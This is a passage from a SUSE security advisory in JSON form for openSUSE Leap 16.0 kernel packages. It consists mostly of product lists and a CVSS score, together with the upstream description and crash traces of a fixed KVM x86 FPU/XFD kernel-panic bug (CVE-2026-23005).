"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2026-23002"
},
{
"cve": "CVE-2026-23005",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23005"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nx86/fpu: Clear XSTATE_BV[i] in guest XSAVE state whenever XFD[i]=1\n\nWhen loading guest XSAVE state via KVM_SET_XSAVE, and when updating XFD in\nresponse to a guest WRMSR, clear XFD-disabled features in the saved (or to\nbe restored) XSTATE_BV to ensure KVM doesn\u0027t attempt to load state for\nfeatures that are disabled via the guest\u0027s XFD. Because the kernel\nexecutes XRSTOR with the guest\u0027s XFD, saving XSTATE_BV[i]=1 with XFD[i]=1\nwill cause XRSTOR to #NM and panic the kernel.\n\nE.g. if fpu_update_guest_xfd() sets XFD without clearing XSTATE_BV:\n\n ------------[ cut here ]------------\n WARNING: arch/x86/kernel/traps.c:1524 at exc_device_not_available+0x101/0x110, CPU#29: amx_test/848\n Modules linked in: kvm_intel kvm irqbypass\n CPU: 29 UID: 1000 PID: 848 Comm: amx_test Not tainted 6.19.0-rc2-ffa07f7fd437-x86_amx_nm_xfd_non_init-vm #171 NONE\n Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 0.0.0 02/06/2015\n RIP: 0010:exc_device_not_available+0x101/0x110\n Call Trace:\n \u003cTASK\u003e\n asm_exc_device_not_available+0x1a/0x20\n RIP: 0010:restore_fpregs_from_fpstate+0x36/0x90\n switch_fpu_return+0x4a/0xb0\n kvm_arch_vcpu_ioctl_run+0x1245/0x1e40 [kvm]\n kvm_vcpu_ioctl+0x2c3/0x8f0 [kvm]\n __x64_sys_ioctl+0x8f/0xd0\n do_syscall_64+0x62/0x940\n entry_SYSCALL_64_after_hwframe+0x4b/0x53\n \u003c/TASK\u003e\n ---[ end trace 0000000000000000 ]---\n\nThis can happen if the guest executes WRMSR(MSR_IA32_XFD) to set XFD[18] = 1,\nand a host IRQ triggers kernel_fpu_begin() prior to the vmexit handler\u0027s\ncall to fpu_update_guest_xfd().\n\nand if userspace stuffs XSTATE_BV[i]=1 via KVM_SET_XSAVE:\n\n ------------[ cut here ]------------\n WARNING: arch/x86/kernel/traps.c:1524 at exc_device_not_available+0x101/0x110, CPU#14: amx_test/867\n Modules linked in: kvm_intel kvm irqbypass\n CPU: 14 UID: 1000 PID: 867 Comm: amx_test Not tainted 6.19.0-rc2-2dace9faccd6-x86_amx_nm_xfd_non_init-vm #168 NONE\n Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 0.0.0 02/06/2015\n RIP: 0010:exc_device_not_available+0x101/0x110\n Call Trace:\n \u003cTASK\u003e\n asm_exc_device_not_available+0x1a/0x20\n RIP: 0010:restore_fpregs_from_fpstate+0x36/0x90\n fpu_swap_kvm_fpstate+0x6b/0x120\n kvm_load_guest_fpu+0x30/0x80 [kvm]\n kvm_arch_vcpu_ioctl_run+0x85/0x1e40 [kvm]\n kvm_vcpu_ioctl+0x2c3/0x8f0 [kvm]\n __x64_sys_ioctl+0x8f/0xd0\n do_syscall_64+0x62/0x940\n entry_SYSCALL_64_after_hwframe+0x4b/0x53\n \u003c/TASK\u003e\n ---[ end trace 0000000000000000 ]---\n\nThe new behavior is consistent with the AMX architecture. Per Intel\u0027s SDM,\nXSAVE saves XSTATE_BV as \u00270\u0027 for components that are disabled via XFD\n(and non-compacted XSAVE saves the initial configuration of the state\ncomponent):\n\n If XSAVE, XSAVEC, XSAVEOPT, or XSAVES is saving the state component i,\n the instruction does not generate #NM when XCR0[i] = IA32_XFD[i] = 1;\n instead, it operates as if XINUSE[i] = 0 (and the state component was\n in its initial state): it saves bit i of XSTATE_BV field of the XSAVE\n header as 0; in addition, XSAVE saves the initial configuration of the\n state component (the other instructions do not save state component i).\n\nAlternatively, KVM could always do XRSTOR with XFD=0, e.g. by using\na constant XFD based on the set of enabled features when XSAVEing for\na struct fpu_guest. However, having XSTATE_BV[i]=1 for XFD-disabled\nfeatures can only happen in the above interrupt case, or in similar\nscenarios involving preemption on preemptible kernels, because\nfpu_swap_kvm_fpstate()\u0027s call to save_fpregs_to_fpstate() saves the\noutgoing FPU state with the current XFD; and that is (on all but the\nfirst WRMSR to XFD) the guest XFD.\n\nTherefore, XFD can only go out of sync with XSTATE_BV in the above\ninterrupt case, or in similar scenarios involving preemption on\npreemptible kernels, and it we can consider it (de facto) part of KVM\nABI that KVM_GET_XSAVE returns XSTATE_BV[i]=0 for XFD-disabled features.\n\n[Move clea\n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
